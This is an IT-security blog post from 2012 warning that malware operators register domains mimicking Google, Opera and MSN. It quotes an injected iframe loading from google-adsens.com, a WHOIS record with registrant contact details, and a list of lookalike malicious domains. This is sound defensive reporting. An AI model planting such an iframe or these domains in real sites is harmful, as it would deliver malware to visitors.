The Latest in IT Security

Malware That Pretends To Be Google

06
Jul
2012

Malware authors (AKA the criminals or the bad guys), use many advanced techniques to hide their activities. From encoding, to encrypting, to auto-generated random domains, conditional redirections and many other interesting methods.

In the middle of all their advanced options, they also use simple techniques to confuse the end user to think that a malicious domain is from a legitimate organization. As of late, it seems the usual organization chosen is Google.

What do you think a user will think when they see the following code on their site:

<iframe src=”http://google-adsens.com/in.cgi?2“.

Yes, they will think it is the Google Adsense code, and not worry too much about it. However, that domain is not from Google. It was just registered a few months ago:

Domain Name: GOOGLE-ADSENS.COM
Registrar: BIZCN.COM, INC.
Whois Server: whois.bizcn.com
Referral URL: http://www.bizcn.com
Name Server: NS1.GOOGLE-ADSENS.COM
Name Server: NS2.GOOGLE-ADSENS.COM
Updated Date: 12-mar-2012
Creation Date: 21-feb-2012

Registrant Contact:
PatrosInc
Elisabeth Defeo [email protected]
609981987 fax: 609981987
Camino Real, 40
Bedia Bedia 48390
es

It is being used to distribure malware. Same applies to mygooglemy.com, a domain registered 2 months ago and also being used to distribute malware (currently redirecting users to pokosa.com). And according to Google, it has infected aeound 1500 different sites:

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 1415 domain(s), including socialnojornalismo.com.br/, izzalini.org/, lullaby-land.com/.

That’s just a couple examples. We see often domains pretending to be affiliated with Google, Opera, MSN and others:

operabwo.ru
mygooglemy.com
google-adsens.com
goooogle.osa.pl
googleapi15.ru
google-update.ikwb.com
googleys.ru
www.whygooglewhy.com
googletest.ipq.co
www.google-sales.com
operaupdatenow.in
opera65.com
msnupdateserver.info
firefoxstabs.com
wordpressmuhelp.com

So, next time you see a site like www.google-sales.com loading in your browser, make sure it is really a valid domain. If in doubt, scan it on SiteCheck or run a whois on the domain to see who registered it.

Related posts:
  1. Spam Called “Google Pharmacy” is In the Wild
  2. Malware Redirecting To Enormousw1illa.com
  3. Google blacklisted all the .cz.cc domains
  4. Google AdWords phishing attack strikes inboxes
  5. Search for Google Chrome leads to Compromised Chrome Plugin Forum

Tags:  
Written by Sucuri
0 Comments

Leave a reply


Categories

THURSDAY, APRIL 25, 2024
WHITE PAPERS

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...

Featured

Archives

Latest Comments